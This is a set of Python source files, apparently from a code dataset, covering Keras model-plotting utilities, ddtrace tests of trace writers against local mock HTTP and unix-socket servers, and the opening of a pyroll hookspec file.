  """Return True when both pydot and a working Graphviz are available."""
  if pydot is None:
    # None of the pydot variants could be imported at module load time.
    return False
  try:
    # Rendering an empty graph exercises the Graphviz executables, so this
    # fails when pydot is present but Graphviz is not installed.
    blank_graph = pydot.Dot()
    pydot.Dot.create(blank_graph)
  except (OSError, pydot.InvocationException):
    return False
  return True
def is_wrapped_model(layer):
  """Return True for a `Wrapper` layer whose inner layer is a functional model."""
  from tensorflow.python.keras.engine import functional
  from tensorflow.python.keras.layers import wrappers
  if not isinstance(layer, wrappers.Wrapper):
    return False
  return isinstance(layer.layer, functional.Functional)
def add_edge(dot, src, dst):
  """Add a src->dst edge to *dot*, skipping edges that already exist."""
  already_present = dot.get_edge(src, dst)
  if not already_present:
    dot.add_edge(pydot.Edge(src, dst))
@keras_export('keras.utils.model_to_dot')
def model_to_dot(model,
                 show_shapes=False,
                 show_dtype=False,
                 show_layer_names=True,
                 rankdir='TB',
                 expand_nested=False,
                 dpi=96,
                 subgraph=False):
  """Convert a Keras model to dot format.

  Arguments:
    model: A Keras model instance.
    show_shapes: whether to display shape information.
    show_dtype: whether to display layer dtypes.
    show_layer_names: whether to display layer names.
    rankdir: `rankdir` argument passed to PyDot,
        a string specifying the format of the plot:
        'TB' creates a vertical plot;
        'LR' creates a horizontal plot.
    expand_nested: whether to expand nested models into clusters.
    dpi: Dots per inch.
    subgraph: whether to return a `pydot.Cluster` instance.

  Returns:
    A `pydot.Dot` instance representing the Keras model or
    a `pydot.Cluster` instance representing nested model if
    `subgraph=True`.

  Raises:
    ImportError: if graphviz or pydot are not available.
  """
  from tensorflow.python.keras.layers import wrappers
  from tensorflow.python.keras.engine import sequential
  from tensorflow.python.keras.engine import functional

  if not check_pydot():
    # Bug fix: the original had a stray trailing comma after the second
    # string fragment, which made `message` a 2-tuple, so both print() and
    # ImportError received a tuple rather than a single string.
    message = (
        'Failed to import pydot. You must `pip install pydot` '
        'and install graphviz (https://graphviz.gitlab.io/download/), '
        'for `pydotprint` to work.')
    if 'IPython.core.magics.namespace' in sys.modules:
      # We don't raise an exception here in order to avoid crashing notebook
      # tests where graphviz is not available.
      print(message)
      return
    else:
      raise ImportError(message)

  if subgraph:
    dot = pydot.Cluster(style='dashed', graph_name=model.name)
    dot.set('label', model.name)
    dot.set('labeljust', 'l')
  else:
    dot = pydot.Dot()
    dot.set('rankdir', rankdir)
    dot.set('concentrate', True)
    dot.set('dpi', dpi)
    dot.set_node_defaults(shape='record')

  # First/last pydot nodes of each nested submodel, keyed by submodel name,
  # used below to wire edges into and out of expanded clusters.
  sub_n_first_node = {}
  sub_n_last_node = {}
  sub_w_first_node = {}
  sub_w_last_node = {}

  layers = model.layers
  if not model._is_graph_network:
    # Subclassed models have no inspectable graph: render a single node.
    node = pydot.Node(str(id(model)), label=model.name)
    dot.add_node(node)
    return dot
  elif isinstance(model, sequential.Sequential):
    if not model.built:
      model.build()
    layers = super(sequential.Sequential, model).layers

  # Create graph nodes.
  for layer in layers:
    layer_id = str(id(layer))

    # Append a wrapped layer's label to node's label, if it exists.
    layer_name = layer.name
    class_name = layer.__class__.__name__

    if isinstance(layer, wrappers.Wrapper):
      if expand_nested and isinstance(layer.layer,
                                      functional.Functional):
        submodel_wrapper = model_to_dot(layer.layer,
                                        show_shapes,
                                        show_dtype,
                                        show_layer_names,
                                        rankdir,
                                        expand_nested,
                                        subgraph=True)
        # sub_w : submodel_wrapper
        sub_w_nodes = submodel_wrapper.get_nodes()
        sub_w_first_node[layer.layer.name] = sub_w_nodes[0]
        sub_w_last_node[layer.layer.name] = sub_w_nodes[-1]
        dot.add_subgraph(submodel_wrapper)
      else:
        layer_name = '{}({})'.format(layer_name, layer.layer.name)
        child_class_name = layer.layer.__class__.__name__
        class_name = '{}({})'.format(class_name, child_class_name)

    if expand_nested and isinstance(layer, functional.Functional):
      submodel_not_wrapper = model_to_dot(layer,
                                          show_shapes,
                                          show_dtype,
                                          show_layer_names,
                                          rankdir,
                                          expand_nested,
                                          subgraph=True)
      # sub_n : submodel_not_wrapper
      sub_n_nodes = submodel_not_wrapper.get_nodes()
      sub_n_first_node[layer.name] = sub_n_nodes[0]
      sub_n_last_node[layer.name] = sub_n_nodes[-1]
      dot.add_subgraph(submodel_not_wrapper)

    # Create node's label.
    if show_layer_names:
      label = '{}: {}'.format(layer_name, class_name)
    else:
      label = class_name

    # Rebuild the label as a table including the layer's dtype.
    if show_dtype:

      def format_dtype(dtype):
        if dtype is None:
          return '?'
        else:
          return str(dtype)

      label = '%s|%s' % (label, format_dtype(layer.dtype))

    # Rebuild the label as a table including input/output shapes.
    if show_shapes:

      def format_shape(shape):
        return str(shape).replace(str(None), '?')

      try:
        outputlabels = format_shape(layer.output_shape)
      except AttributeError:
        outputlabels = '?'
      if hasattr(layer, 'input_shape'):
        inputlabels = format_shape(layer.input_shape)
      elif hasattr(layer, 'input_shapes'):
        inputlabels = ', '.join(
            [format_shape(ishape) for ishape in layer.input_shapes])
      else:
        inputlabels = '?'
      label = '%s\n|{input:|output:}|{{%s}|{%s}}' % (label,
                                                     inputlabels,
                                                     outputlabels)

    # Expanded nested models are rendered as clusters above, not as nodes.
    if not expand_nested or not isinstance(
        layer, functional.Functional):
      node = pydot.Node(layer_id, label=label)
      dot.add_node(node)

  # Connect nodes with edges.
  for layer in layers:
    layer_id = str(id(layer))
    for i, node in enumerate(layer._inbound_nodes):
      node_key = layer.name + '_ib-' + str(i)
      if node_key in model._network_nodes:
        for inbound_layer in nest.flatten(node.inbound_layers):
          inbound_layer_id = str(id(inbound_layer))
          if not expand_nested:
            assert dot.get_node(inbound_layer_id)
            assert dot.get_node(layer_id)
            add_edge(dot, inbound_layer_id, layer_id)
          else:
            # if inbound_layer is not Model or wrapped Model
            if (not isinstance(inbound_layer,
                               functional.Functional) and
                not is_wrapped_model(inbound_layer)):
              # if current layer is not Model or wrapped Model
              if (not isinstance(layer, functional.Functional) and
                  not is_wrapped_model(layer)):
                assert dot.get_node(inbound_layer_id)
                assert dot.get_node(layer_id)
                add_edge(dot, inbound_layer_id, layer_id)
              # if current layer is Model
              elif isinstance(layer, functional.Functional):
                add_edge(dot, inbound_layer_id,
                         sub_n_first_node[layer.name].get_name())
              # if current layer is wrapped Model
              elif is_wrapped_model(layer):
                add_edge(dot, inbound_layer_id, layer_id)
                name = sub_w_first_node[layer.layer.name].get_name()
                add_edge(dot, layer_id, name)
            # if inbound_layer is Model
            elif isinstance(inbound_layer, functional.Functional):
              name = sub_n_last_node[inbound_layer.name].get_name()
              if isinstance(layer, functional.Functional):
                output_name = sub_n_first_node[layer.name].get_name()
                add_edge(dot, name, output_name)
              else:
                add_edge(dot, name, layer_id)
            # if inbound_layer is wrapped Model
            elif is_wrapped_model(inbound_layer):
              inbound_layer_name = inbound_layer.layer.name
              add_edge(dot,
                       sub_w_last_node[inbound_layer_name].get_name(),
                       layer_id)
  return dot
@keras_export('keras.utils.plot_model')
def plot_model(model,
               to_file='model.png',
               show_shapes=False,
               show_dtype=False,
               show_layer_names=True,
               rankdir='TB',
               expand_nested=False,
               dpi=96):
  """Converts a Keras model to dot format and save to a file.

  Arguments:
    model: A Keras model instance
    to_file: File name of the plot image.
    show_shapes: whether to display shape information.
    show_dtype: whether to display layer dtypes.
    show_layer_names: whether to display layer names.
    rankdir: `rankdir` argument passed to PyDot, a string specifying the
      format of the plot: 'TB' creates a vertical plot; 'LR' creates a
      horizontal plot.
    expand_nested: Whether to expand nested models into clusters.
    dpi: Dots per inch.

  Returns:
    A Jupyter notebook Image object if Jupyter is installed.
    This enables in-line display of the model plots in notebooks.
  """
  dot_graph = model_to_dot(model,
                           show_shapes=show_shapes,
                           show_dtype=show_dtype,
                           show_layer_names=show_layer_names,
                           rankdir=rankdir,
                           expand_nested=expand_nested,
                           dpi=dpi)
  to_file = path_to_string(to_file)
  if dot_graph is None:
    # model_to_dot prints a warning (instead of raising) inside notebooks
    # when pydot/graphviz are missing; there is nothing to render then.
    return
  _, extension = os.path.splitext(to_file)
  # Default to PNG when the target path has no extension.
  extension = extension[1:] if extension else 'png'
  # Save image to disk.
  dot_graph.write(to_file, format=extension)
  # Return the image as a Jupyter Image object, to be displayed in-line.
  # Note that we cannot easily detect whether the code is running in a
  # notebook, and thus we always return the Image if Jupyter is available.
  if extension != 'pdf':
    try:
      from IPython import display
      return display.Image(filename=to_file)
    except ImportError:
      pass
| 36.541787 | 80 | 0.623738 |
acfb5a226c165aedfabf52744be6be9368740a0d | 19,460 | py | Python | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | tests/tracer/test_writer.py | KDWSS/dd-trace-py | 6d859bec403347f7c1e7efd039210908b562741e | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | import os
import socket
import tempfile
import threading
import time
import mock
import msgpack
import pytest
from six.moves import BaseHTTPServer
from six.moves import socketserver
from ddtrace.constants import KEEP_SPANS_RATE_KEY
from ddtrace.internal.compat import PY3
from ddtrace.internal.compat import get_connection_response
from ddtrace.internal.compat import httplib
from ddtrace.internal.uds import UDSHTTPConnection
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.internal.writer import Response
from ddtrace.internal.writer import _human_size
from ddtrace.span import Span
from tests.utils import AnyInt
from tests.utils import BaseTestCase
from tests.utils import override_env
class DummyOutput:
    """In-memory sink that mimics a writable stream for tests."""

    def __init__(self):
        # Messages collected in write order.
        self.entries = []

    def write(self, message):
        """Record *message* instead of emitting it anywhere."""
        self.entries.append(message)

    def flush(self):
        """No-op: nothing is buffered."""
class AgentWriterTests(BaseTestCase):
N_TRACES = 11
def test_metrics_disabled(self):
statsd = mock.Mock()
writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
for i in range(10):
writer.write(
[Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
)
writer.stop()
writer.join()
statsd.increment.assert_not_called()
statsd.distribution.assert_not_called()
    def test_metrics_bad_endpoint(self):
        """Even when the agent URL is unreachable, accepted-trace/span counts
        and HTTP error metrics are still reported to dogstatsd."""
        statsd = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.stop()
        writer.join()
        statsd.distribution.assert_has_calls(
            [
                mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
                mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
                mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
                mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
                mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
            ],
            any_order=True,
        )
    def test_metrics_trace_too_big(self):
        """An oversized trace is dropped with reason `t_too_big` while the
        normally-sized traces are still accepted into the buffer."""
        statsd = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        # 1024 spans with a 5000-char name: intentionally exceeds the max trace size.
        writer.write(
            [Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
        )
        writer.stop()
        writer.join()
        statsd.distribution.assert_has_calls(
            [
                mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
                mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
                mock.call("datadog.tracer.buffer.dropped.traces", 1, tags=["reason:t_too_big"]),
                mock.call("datadog.tracer.buffer.dropped.bytes", AnyInt(), tags=["reason:t_too_big"]),
                mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
                mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
                mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
            ],
            any_order=True,
        )
    def test_metrics_multi(self):
        """Metrics are reported on an explicit flush_queue() and again after a
        second batch followed by stop()/join()."""
        statsd = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True)
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.flush_queue()
        statsd.distribution.assert_has_calls(
            [
                mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
                mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
                mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
                mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
                mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
            ],
            any_order=True,
        )
        # Second round: the same metrics must be re-emitted after a reset.
        statsd.reset_mock()
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.stop()
        writer.join()
        statsd.distribution.assert_has_calls(
            [
                mock.call("datadog.tracer.buffer.accepted.traces", 10, tags=[]),
                mock.call("datadog.tracer.buffer.accepted.spans", 50, tags=[]),
                mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
                mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
                mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
            ],
            any_order=True,
        )
    def test_write_sync(self):
        """In sync_mode a single write() immediately attempts the flush and
        reports the per-write metrics."""
        statsd = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=True, sync_mode=True)
        writer.write([Span(tracer=None, name="name", trace_id=1, span_id=j, parent_id=j - 1 or None) for j in range(5)])
        statsd.distribution.assert_has_calls(
            [
                mock.call("datadog.tracer.buffer.accepted.traces", 1, tags=[]),
                mock.call("datadog.tracer.buffer.accepted.spans", 5, tags=[]),
                mock.call("datadog.tracer.http.requests", writer.RETRY_ATTEMPTS, tags=[]),
                mock.call("datadog.tracer.http.errors", 1, tags=["type:err"]),
                mock.call("datadog.tracer.http.dropped.bytes", AnyInt(), tags=[]),
            ],
            any_order=True,
        )
    def test_drop_reason_bad_endpoint(self):
        """Traces sent to an unreachable endpoint are counted as HTTP drops."""
        statsd = mock.Mock()
        writer_metrics_reset = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
        # Stub out the reset so the counters survive for inspection below.
        writer._metrics_reset = writer_metrics_reset
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.stop()
        writer.join()
        writer_metrics_reset.assert_called_once()
        # One failed request, all 10 traces dropped.
        assert 1 == writer._metrics["http.errors"]["count"]
        assert 10 == writer._metrics["http.dropped.traces"]["count"]
    def test_drop_reason_trace_too_big(self):
        """An oversized trace is dropped with reason tag "t_too_big"."""
        statsd = mock.Mock()
        writer_metrics_reset = mock.Mock()
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
        # Stub out the reset so the counters survive for inspection below.
        writer._metrics_reset = writer_metrics_reset
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        # 1024 spans with 5000-char names exceeds the single-trace size limit.
        writer.write(
            [Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
        )
        writer.stop()
        writer.join()
        writer_metrics_reset.assert_called_once()
        assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
        assert ["reason:t_too_big"] == writer._metrics["buffer.dropped.traces"]["tags"]
    def test_drop_reason_buffer_full(self):
        """Once the buffer is full, the next trace is dropped with reason "full"."""
        statsd = mock.Mock()
        writer_metrics_reset = mock.Mock()
        # buffer_size=5300 is sized to hold the first 10 traces but not an 11th.
        writer = AgentWriter(agent_url="http://asdf:1234", buffer_size=5300, dogstatsd=statsd, report_metrics=False)
        # Stub out the reset so the counters survive for inspection below.
        writer._metrics_reset = writer_metrics_reset
        for i in range(10):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.write([Span(tracer=None, name="a", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)])
        writer.stop()
        writer.join()
        writer_metrics_reset.assert_called_once()
        assert 1 == writer._metrics["buffer.dropped.traces"]["count"]
        assert ["reason:full"] == writer._metrics["buffer.dropped.traces"]["tags"]
    def test_drop_reason_encoding_error(self):
        """Traces whose encoding raises are counted as encoder drops."""
        n_traces = 10
        statsd = mock.Mock()
        writer_encoder = mock.Mock()
        # Bind __len__ on the mock so len(encoder) reports the queued traces.
        writer_encoder.__len__ = (lambda *args: n_traces).__get__(writer_encoder)
        writer_metrics_reset = mock.Mock()
        # Any encode attempt blows up, forcing the drop path.
        writer_encoder.encode.side_effect = Exception
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
        writer._encoder = writer_encoder
        writer._metrics_reset = writer_metrics_reset
        for i in range(n_traces):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            )
        writer.stop()
        writer.join()
        writer_metrics_reset.assert_called_once()
        assert 10 == writer._metrics["encoder.dropped.traces"]["count"]
    def test_keep_rate(self):
        """The keep-rate SMA tracks the historical ratio of sent vs. dropped
        traces, and each sent trace carries the *previous* keep rate in its
        metrics under KEEP_SPANS_RATE_KEY.
        """
        statsd = mock.Mock()
        writer_run_periodic = mock.Mock()
        writer_put = mock.Mock()
        # Pretend the agent accepts everything we manage to encode.
        writer_put.return_value = Response(status=200)
        writer = AgentWriter(agent_url="http://asdf:1234", dogstatsd=statsd, report_metrics=False)
        writer.run_periodic = writer_run_periodic
        writer._put = writer_put

        # 4 small traces that encode fine...
        traces = [
            [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(5)]
            for i in range(4)
        ]
        # ...and 4 oversized traces that will be rejected by the buffer.
        traces_too_big = [
            [Span(tracer=None, name="a" * 5000, trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(2 ** 10)]
            for i in range(4)
        ]

        # 1. We write 4 traces successfully.
        for trace in traces:
            writer.write(trace)
        writer.flush_queue()
        payload = msgpack.unpackb(writer_put.call_args.args[0])
        # No previous drops.
        assert 0.0 == writer._drop_sma.get()
        # 4 traces written.
        assert 4 == len(payload)
        # 100% of traces kept (refers to the past).
        # No traces sent before now so 100% kept.
        for trace in payload:
            assert 1.0 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)

        # 2. We fail to write 4 traces because of size limitation.
        for trace in traces_too_big:
            writer.write(trace)
        writer.flush_queue()
        # 50% of traces were dropped historically.
        # 4 successfully written before and 4 dropped now.
        assert 0.5 == writer._drop_sma.get()
        # put not called since no new traces are available.
        writer_put.assert_called_once()

        # 3. We write 2 traces successfully.
        for trace in traces[:2]:
            writer.write(trace)
        writer.flush_queue()
        payload = msgpack.unpackb(writer_put.call_args.args[0])
        # 40% of traces were dropped historically.
        assert 0.4 == writer._drop_sma.get()
        # 2 traces written.
        assert 2 == len(payload)
        # 50% of traces kept (refers to the past).
        # We had 4 successfully written and 4 dropped.
        for trace in payload:
            assert 0.5 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)

        # 4. We write 1 trace successfully and fail to write 3.
        writer.write(traces[0])
        for trace in traces_too_big[:3]:
            writer.write(trace)
        writer.flush_queue()
        payload = msgpack.unpackb(writer_put.call_args.args[0])
        # 50% of traces were dropped historically.
        assert 0.5 == writer._drop_sma.get()
        # 1 trace written.
        assert 1 == len(payload)
        # 60% of traces kept (refers to the past).
        # We had 4 successfully written, then 4 dropped, then 2 written.
        for trace in payload:
            assert 0.6 == trace[0]["metrics"].get(KEEP_SPANS_RATE_KEY, -1)
class LogWriterTests(BaseTestCase):
    """Tests for LogWriter, which emits traces to an output object."""

    # Number of traces written by create_writer().
    N_TRACES = 11

    def create_writer(self):
        """Build a LogWriter over a fresh DummyOutput and feed it N_TRACES
        traces of 7 chained spans each; returns the writer."""
        self.output = DummyOutput()
        writer = LogWriter(out=self.output)
        for i in range(self.N_TRACES):
            writer.write(
                [Span(tracer=None, name="name", trace_id=i, span_id=j, parent_id=j - 1 or None) for j in range(7)]
            )
        return writer

    def test_log_writer(self):
        """Each written trace must produce exactly one output entry."""
        self.create_writer()
        self.assertEqual(len(self.output.entries), self.N_TRACES)
def test_humansize():
    """_human_size renders byte counts with decimal (power-of-10) units."""
    expectations = (
        (0, "0B"),
        (999, "999B"),
        (1000, "1KB"),
        (10000, "10KB"),
        (100000, "100KB"),
        (1000000, "1MB"),
        (10000000, "10MB"),
        (1000000000, "1GB"),
    )
    for num_bytes, rendered in expectations:
        assert _human_size(num_bytes) == rendered
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Common base for the test handlers: plain-text errors, silent logging."""

    error_message_format = "%(message)s\n"
    error_content_type = "text/plain"

    @staticmethod
    def log_message(format, *args):  # noqa: A002
        # Suppress per-request stderr logging during the test run.
        pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
    """Answers every PUT with 200, optionally asserting the request path."""

    # Class-level: when set, every PUT path must start with this prefix.
    expected_path_prefix = None

    def do_PUT(self):
        if self.expected_path_prefix is not None:
            assert self.path.startswith(self.expected_path_prefix)
        # send_error() conveniently writes a complete response; 200 == success.
        self.send_error(200, "OK")
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
    """Simulates a hanging agent: the PUT handler stalls past client timeouts."""

    def do_PUT(self):
        # This server sleeps longer than our timeout
        time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
    """Simulates a dropped connection: returns without writing any response."""

    def do_PUT(self):
        return
# Host and ports used by the throwaway test servers below; consecutive ports
# keep the OK/timeout/reset servers from colliding with each other.
_HOST = "0.0.0.0"
_PORT = 8743
_TIMEOUT_PORT = _PORT + 1
_RESET_PORT = _TIMEOUT_PORT + 1
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
    """HTTP server listening on a unix domain socket."""

    def server_bind(self):
        # Use HTTPServer's bind (not UnixStreamServer's) so server_name /
        # server_port get set up for BaseHTTPRequestHandler.
        BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
    """Start a UDSHTTPServer bound at `path` in a daemon thread.

    Polls the socket with PUT requests until a 200 response confirms the
    server is serving, then returns the (server, thread) pair.
    """
    server = UDSHTTPServer(path, request_handler)
    t = threading.Thread(target=server.serve_forever)
    # Set daemon just in case something fails
    t.daemon = True
    t.start()

    # Wait for the server to start
    resp = None
    while resp != 200:
        conn = UDSHTTPConnection(server.server_address, _HOST, 2019)
        try:
            conn.request("PUT", "/")
            resp = get_connection_response(conn).status
        finally:
            conn.close()
        # Short backoff between readiness probes.
        time.sleep(0.01)

    return server, t
@pytest.fixture
def endpoint_uds_server():
    """Yield a UDS HTTP server that asserts requests target a "/v0." path.

    The socket is created inside a private temporary directory instead of a
    ``tempfile.mktemp()`` path: ``mktemp`` is deprecated and race-prone, while
    ``mkdtemp`` guarantees a directory only this process can name files in.
    """
    socket_dir = tempfile.mkdtemp()
    socket_name = os.path.join(socket_dir, "uds_server.sock")
    handler = _APIEndpointRequestHandlerTest
    server, thread = _make_uds_server(socket_name, handler)
    handler.expected_path_prefix = "/v0."
    try:
        yield server
    finally:
        # Clear the class-level expectation so other tests are unaffected.
        handler.expected_path_prefix = None
        server.shutdown()
        thread.join()
        os.unlink(socket_name)
        os.rmdir(socket_dir)
def _make_server(port, request_handler):
    """Serve `request_handler` on _HOST:port from a daemon thread.

    Returns the server together with the thread running it.
    """
    httpd = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
    serving_thread = threading.Thread(target=httpd.serve_forever)
    # Daemonize so a failing test cannot keep the process alive.
    serving_thread.daemon = True
    serving_thread.start()
    return httpd, serving_thread
@pytest.fixture(scope="module")
def endpoint_test_timeout_server():
    """Module-scoped server whose PUT handler sleeps past client timeouts."""
    server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
    try:
        yield thread
    finally:
        server.shutdown()
        thread.join()
@pytest.fixture(scope="module")
def endpoint_test_reset_server():
    """Module-scoped server whose PUT handler closes without responding."""
    server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
    try:
        yield thread
    finally:
        server.shutdown()
        thread.join()
@pytest.fixture
def endpoint_assert_path():
    """Yield a callable that sets the path prefix the server asserts on PUTs."""
    handler = _APIEndpointRequestHandlerTest
    server, thread = _make_server(_PORT, handler)

    def configure(expected_path_prefix=None):
        # Stored class-level; checked inside the handler's do_PUT.
        handler.expected_path_prefix = expected_path_prefix
        return thread

    try:
        yield configure
    finally:
        # Reset so later tests inherit no stale expectation.
        handler.expected_path_prefix = None
        server.shutdown()
        thread.join()
def test_agent_url_path(endpoint_assert_path):
    """The writer targets <base path>/v0.x regardless of trailing slashes."""
    # test without base path
    endpoint_assert_path("/v0.")
    writer = AgentWriter(agent_url="http://%s:%s/" % (_HOST, _PORT))
    writer._encoder.put([Span(None, "foobar")])
    writer.flush_queue(raise_exc=True)

    # test without base path nor trailing slash
    writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _PORT))
    writer._encoder.put([Span(None, "foobar")])
    writer.flush_queue(raise_exc=True)

    # test with a base path
    endpoint_assert_path("/test/v0.")
    writer = AgentWriter(agent_url="http://%s:%s/test/" % (_HOST, _PORT))
    writer._encoder.put([Span(None, "foobar")])
    writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout_connect():
    """Flushing to a port nobody listens on raises a connection error."""
    writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, 2019))
    if PY3:
        exc_type = OSError
    else:
        # Python 2: socket.error was not yet an alias of OSError.
        exc_type = socket.error
    with pytest.raises(exc_type):
        writer._encoder.put([Span(None, "foobar")])
        writer.flush_queue(raise_exc=True)
def test_flush_connection_timeout(endpoint_test_timeout_server):
    """A server that never answers makes the flush raise socket.timeout."""
    writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _TIMEOUT_PORT))
    with pytest.raises(socket.timeout):
        writer._encoder.put([Span(None, "foobar")])
        writer.flush_queue(raise_exc=True)
def test_flush_connection_reset(endpoint_test_reset_server):
    """A server that closes without responding surfaces a reset/bad status."""
    writer = AgentWriter(agent_url="http://%s:%s" % (_HOST, _RESET_PORT))
    if PY3:
        # Python 3 may raise ConnectionResetError instead of BadStatusLine.
        exc_types = (httplib.BadStatusLine, ConnectionResetError)
    else:
        exc_types = (httplib.BadStatusLine,)
    with pytest.raises(exc_types):
        writer._encoder.put([Span(None, "foobar")])
        writer.flush_queue(raise_exc=True)
def test_flush_connection_uds(endpoint_uds_server):
    """Flushing over a unix domain socket agent URL succeeds."""
    writer = AgentWriter(agent_url="unix://%s" % endpoint_uds_server.server_address)
    writer._encoder.put([Span(None, "foobar")])
    writer.flush_queue(raise_exc=True)
def test_flush_queue_raise():
    """raise_exc controls whether flush failures propagate to the caller."""
    writer = AgentWriter(agent_url="http://dne:1234")

    # Should not raise
    writer.write([])
    writer.flush_queue(raise_exc=False)

    # Python 2 raises IOError where Python 3 raises OSError.
    error = OSError if PY3 else IOError
    with pytest.raises(error):
        writer.write([])
        writer.flush_queue(raise_exc=True)
def test_racing_start():
    """Concurrent writes from 100 threads must not lose any trace."""
    writer = AgentWriter(agent_url="http://dne:1234")

    def do_write(i):
        writer.write([Span(None, str(i))])

    ts = [threading.Thread(target=do_write, args=(i,)) for i in range(100)]
    for t in ts:
        t.start()
    for t in ts:
        t.join()

    # All 100 traces made it into the encoder despite the race on start().
    assert len(writer._encoder) == 100
def test_additional_headers():
    """Headers from _DD_TRACE_WRITER_ADDITIONAL_HEADERS ("k:v,k2:v2") are parsed."""
    with override_env(dict(_DD_TRACE_WRITER_ADDITIONAL_HEADERS="additional-header:additional-value,header2:value2")):
        writer = AgentWriter(agent_url="http://localhost:9126")
        assert writer._headers["additional-header"] == "additional-value"
        assert writer._headers["header2"] == "value2"
def test_bad_encoding(monkeypatch):
    """An unknown DD_TRACE_API_VERSION makes writer construction fail."""
    monkeypatch.setenv("DD_TRACE_API_VERSION", "foo")
    with pytest.raises(ValueError):
        AgentWriter(agent_url="http://localhost:9126")
| 35 | 120 | 0.634943 |
acfb5b09345a7e7e63d26c77aa093c06e7492606 | 220 | py | Python | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | pyroll/core/transport/hookspecs/out_profile.py | pyroll-project/pyroll-core | f59094d58c2f7493ddc6345b3afc4700ca259681 | [
"BSD-3-Clause"
] | null | null | null | from ..transport import Transport
@Transport.OutProfile.hookspec
def strain(transport: Transport, profile: Transport.OutProfile) -> float:
